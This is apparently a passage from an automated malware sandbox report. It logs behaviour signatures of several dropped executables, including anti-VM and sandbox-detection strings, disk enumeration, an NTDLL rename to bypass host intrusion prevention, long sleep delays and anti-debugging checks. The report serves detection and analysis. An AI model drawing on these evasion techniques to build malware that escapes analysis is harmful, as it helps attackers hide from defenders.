              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              barindex
              Yara detected AntiVM3Show sources
              Source: Yara matchFile source: Process Memory Space: B82B.exe PID: 1936, type: MEMORYSTR
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
              Source: 25Kf6vSBoq.exe, 00000002.00000002.311871720.000000000044A000.00000004.00000020.sdmpBinary or memory string: ASWHOOK
              Source: B82B.exe, 00000014.00000003.501647744.000000000666B000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
              Source: B82B.exe, 00000014.00000003.501647744.000000000666B000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLLUSER
              Checks if the current machine is a virtual machine (disk enumeration)Show sources
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
              Renames NTDLL to bypass HIPSShow sources
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeFile opened: C:\Windows\SysWOW64\ntdll.dll
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeFile opened: C:\Windows\SysWOW64\ntdll.dll
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exe TID: 648Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 557
              Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9C1A.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A946B90 rdtsc
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeThread delayed: delay time: 922337203685477
              Source: explorer.exe, 00000004.00000000.304505537.0000000008A32000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
              Source: explorer.exe, 00000004.00000000.304505537.0000000008A32000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
              Source: B82B.exe, 00000014.00000003.501647744.000000000666B000.00000004.00000001.sdmpBinary or memory string: !noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
              Source: B82B.exe, 00000014.00000003.501647744.000000000666B000.00000004.00000001.sdmpBinary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
              Source: explorer.exe, 00000004.00000000.291035195.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
              Source: B82B.exe, 00000014.00000003.501647744.000000000666B000.00000004.00000001.sdmpBinary or memory string: vmware
              Source: B82B.exe, 00000014.00000003.501647744.000000000666B000.00000004.00000001.sdmpBinary or memory string: VMwareVBoxARun using valid operating system
              Source: explorer.exe, 00000004.00000000.291035195.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
              Source: explorer.exe, 00000004.00000000.285419513.00000000048E0000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: explorer.exe, 00000004.00000000.304691629.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
              Source: explorer.exe, 00000004.00000000.291035195.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
              Source: explorer.exe, 00000004.00000000.304691629.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
              Source: explorer.exe, 00000004.00000000.288779454.00000000069DA000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD002
              Source: B82B.exe, 00000014.00000003.501647744.000000000666B000.00000004.00000001.sdmpBinary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
              Source: B82B.exe, 00000014.00000003.501647744.000000000666B000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
              Source: B82B.exe, 00000014.00000003.501647744.000000000666B000.00000004.00000001.sdmpBinary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
              Source: C1B2.exe, 00000015.00000002.614812023.000000000156F000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeProcess information queried: ProcessInformation
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeCode function: 29_2_004040F0 RegCreateKeyExA,RegOpenKeyExA,GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetSystemMetrics,
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeCode function: 29_2_0041B9B2 FindFirstFileExW,
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeSystem information queried: ModuleInformation

              Anti Debugging:

              barindex
              Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))Show sources
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeSystem information queried: CodeIntegrityInformation
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeSystem information queried: CodeIntegrityInformation
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeSystem information queried: CodeIntegrityInformation
              Source: C:\Users\user\AppData\Local\Temp\F4BC.exeSystem information queried: CodeIntegrityInformation
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeCode function: 1_2_00427060 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeCode function: 1_2_02E6D3E4 push dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\6EC5.exeCode function: 13_2_02C30042 push dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94D294 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94D294 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94DA88 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94DA88 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9412BD mov esi, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9412BD mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9412BD mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A911AA0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A945AA0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A945AA0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9152A5 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9152A5 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9152A5 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9152A5 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9152A5 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9E8ADD mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A915AC0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A915AC0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A915AC0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A913ACA mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A942ACB mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A942AE4 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D4AEF mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D4AEF mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D4AEF mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D4AEF mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D4AEF mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D4AEF mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D4AEF mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D4AEF mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D4AEF mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D4AEF mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D4AEF mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D4AEF mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D4AEF mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A9D4AEF mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A915210 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A915210 mov ecx, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A915210 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A915210 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A933A1C mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A928A0A mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A918239 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A918239 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A918239 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A914A20 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A914A20 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A99EA20 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A93A229 mov eax, dword ptr fs:[00000030h]
